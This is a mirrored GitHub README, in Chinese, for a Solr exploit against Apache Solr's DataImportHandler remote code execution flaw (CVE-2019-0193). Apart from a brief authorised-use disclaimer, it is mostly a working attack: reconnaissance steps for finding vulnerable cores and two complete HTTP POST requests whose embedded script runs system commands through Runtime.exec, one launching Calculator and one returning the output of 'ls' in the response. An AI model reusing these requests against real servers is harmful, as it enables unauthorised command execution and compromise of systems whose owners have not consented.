GithubHelp home page GithubHelp logo

solr_exploit's Introduction

声明

此处提供的漏洞检测方法、文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者务必遵守法律规定,禁止在没有得到授权的情况下做任何漏洞检测。

检测漏洞

Apache Solr远程代码执行漏洞(CVE-2019-0193) Exploit

理论上可以使用各种不同类型的数据源来构造EXP,个人感觉使用URLDataSource这种数据源的类型来构造EXP更简单

本EXP用到的URLDataSource类型的数据源是:文档demo.xml

文档demo.xml的内容来自文档slashdot.xml 一份无害的正常XML文档 来自http://rss.slashdot.org/Slashdot/slashdot

我对slashdot.xml做了修改,即删除了部分文本(故意只保留了1个<item>标签 避免多次执行同样的命令) 另存为了文档demo.xml

借用 文档demo.xml 作为“数据源” 即可实现 执行1次命令 并在HTTP response中显示执行结果

步骤1

构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!) 可以直接使用这个

https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml

也可以自己启动web服务器托管文档demo.xml 命令 live-server --port=5555

得到地址 http://127.0.0.1:5555/demo.xml

步骤2

获取Solr中所有索引库(core)的名称

http://{xx.com:80}/solr/admin/cores

HTTP响应 JSON数据 会有所有索引库(core)的名称

"name":"xxxx"

步骤3

判断该索引库是否使用了DataImportHandler模块

方法1

访问
http://{xx.com:80}/solr/{core_name}/admin/mbeans?cat=QUERY&wt=json

如果使用了DataImportHandler模块 则HTTP响应内会有:
org.apache.solr.handler.dataimport.DataImportHandler

否则说明没有使用DataImportHandler模块(不受该漏洞影响)

方法2

访问
http://{xx.com:80}/solr/#/{core_name}/dataimport

如果这个Solr服务器并没有使用dataimport-handler模块(不受该漏洞影响),HTTP响应中会有提示:
sorry, no dataimport-handler defined!

否则说明使用了DataImportHandler模块(受该漏洞影响)

步骤4 构造HTTP请求

检测方法1:弹计算器(Calculator)

注意:需要将以下请求中的字符串"tika"替换为索引库的名称

将请求发送给Solr服务器 执行命令 无回显

POST /solr/tika/dataimport HTTP/1.1
Host: solr.com:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://solr.com:8983/solr/
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 1183
Connection: close

command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=
<dataConfig>

  <dataSource type="URLDataSource"/>
  <script><![CDATA[

          function poc(){
java.lang.Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
}

  ]]></script>


        <document>
                <entity name="slashdot"
                        pk="link"
                        url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
                        processor="XPathEntityProcessor"
                        forEach="/RDF/channel | /RDF/item"
                        transformer="script:poc">


                        <field column="subject"      xpath="/RDF/channel/subject" commonField="true" />

                        <field column="title"        xpath="/RDF/item/title" />
                        <field column="link"         xpath="/RDF/item/link" />

                </entity>
        </document>
</dataConfig>

检测方法2:执行命令 HTTP响应中有执行结果回显

支持多行结果 (我写的是每一行用\n\r结尾)

注意:需要将以下请求中的字符串"tika"替换为索引库的名称

POST /solr/tika/dataimport HTTP/1.1
Host: solr.com:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://solr.com:8983/solr/
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 1231
Connection: close

command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=
<dataConfig>


  <dataSource type="URLDataSource"/>
  <script><![CDATA[

          function poc(row){

 var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("ls").getInputStream()));

var result = [];

while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}

row.put("title",result.join("\n\r"));

return row;

}


  ]]></script>


        <document>
                <entity name="slashdot"
                        pk="link"
                        url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
                        processor="XPathEntityProcessor"
                        forEach="/RDF/channel | /RDF/item"
                        transformer="script:poc">

                        <field column="subject"      xpath="/RDF/channel/subject" commonField="true" />
                        <field column="title"        xpath="/RDF/item/title" />
                        <field column="link"         xpath="/RDF/item/link" />

                </entity>
        </document>
</dataConfig>

solr_exploit's People

Contributors

1135 avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.